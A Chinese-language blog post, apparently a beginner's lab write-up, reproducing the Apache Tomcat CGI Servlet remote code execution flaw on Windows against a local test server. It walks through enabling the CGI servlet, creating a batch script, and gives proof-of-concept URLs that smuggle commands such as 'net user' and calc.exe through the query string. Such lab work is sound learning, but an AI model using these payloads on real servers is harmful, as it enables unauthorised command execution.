在公司呆了一段时间了,bug写了一小堆之后,我居然要开始接触漏洞的东西了,阿巴阿巴。还好这段时间老师带我,同事帮我,所幸没出什么错。然后今天第一次接触漏洞,漏洞是啥。名声在外,但是一直没实 *** 过。于是今天。
纷争开始了...
参考博客:参考博客一:这篇手把手教你复现
参考博客二:这篇是原理
复现要求环境:这是一个Apache Tomcat 远程代码执行漏洞。
配置要求:
1. 系统为Windows
2. 启用了CGI Servlet(默认为关闭)
3. 启用了enableCmdLineArguments(Tomcat 9.0.*及官方未来发布版本默认为关闭)
影响版本:
Apache Tomcat 9.0.0.M1 to 9.0.17
Apache Tomcat 8.5.0 to 8.5.39
Apache Tomcat 7.0.0 to 7.0.93
本文环境:服务端:本机(win10 20H2 [Version: 10.0.19042.1348])
客户端:本机谷歌浏览器
tomcat版本:apache-tomcat-8.5.39
附下载地址:apache-tomcat-8.5.39-windows-x64.zip
jdk版本:jre1.8.0_301
附下载地址:jre-8u301-windows-x64.tar.gz(不知道,下了好久了)
正文开始:第一步:
解压jre,配置tomcat需要的java运行环境。
JRE还是JDK无影响,找到下载的tomcat解压到一个你喜欢的目录:
同样解压tomcat到你喜欢的目录,并找到它:
设置tomcat的环境变量,因为我不想设置系统环境变量,只为这个程序配置,因此只需要修改相关启动脚本,在apache-tomcat-8.5.39bincatalina.bat设置环境变量:
首行增加一句:set JRE_HOME="E:envjre1.8.0_301" //这里换成你自己的jre路径。
第二步:
修改apache-tomcat-8.5.39confserver.xml 找到
executable
1、并修改cgiPathPrefix对应的参数值为WEB-INF/cgi-bin,原来一般是WEB-INF/cgi
我的xml配置后为:
cgi org.apache.catalina.servlets.CGIServlet cgiPathPrefix WEB-INF/cgi-bin executable 5
2、并且取消映射段注释,即使
cgi /cgi-bin/*
段的代码取消注释。
第三步:
修改 apache-tomcat-8.5.39confcontext.xml 配置文件,为
我的文件修改后为:
WEB-INF/web.xml ${catalina.base}/conf/web.xml
第四步:
在apache-tomcat-8.5.39webappsROOTWEB-INF 目录下新建一个cgi-bin 文件夹,并在该文件夹内新建文件 hello.bat
编辑hello.bat 写入以下内容:
@echo off echo Content-Type: text/plain echo. set foo=%~1 %foo%
第五步:
启动tomcat(apache-tomcat-8.5.39binstartup.bat)
浏览器访问本地8080端口:127.0.0.1:8080
tomcat正常启动 访问8080端口
至此,环境搭建完成。
漏洞复现:Poc:
http://127.0.0.1:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user
http://127.0.0.1:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe
拓展延伸:我们通过第第二篇引用博客里博主讲解的原理很容易知道,当浏览器访问以上触发漏洞的url时,会将url请求的参数部分按+号进行分割,最后执行时进行组合,因此我们可以自行组合任意执行大多数我们知道的cmd命令了,如:
查看服务器网络连接状态:
让服务器ping 任意一个地址:
获取服务器的网络适配器的相关情况:
写在最后:这是第一次真的自己手动实际 *** 作去复现一个漏洞,当然这个漏洞十分简陋,而且教程傻瓜式。启蒙第一课,还是感觉好神奇啊。打开了潘多拉的魔盒
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)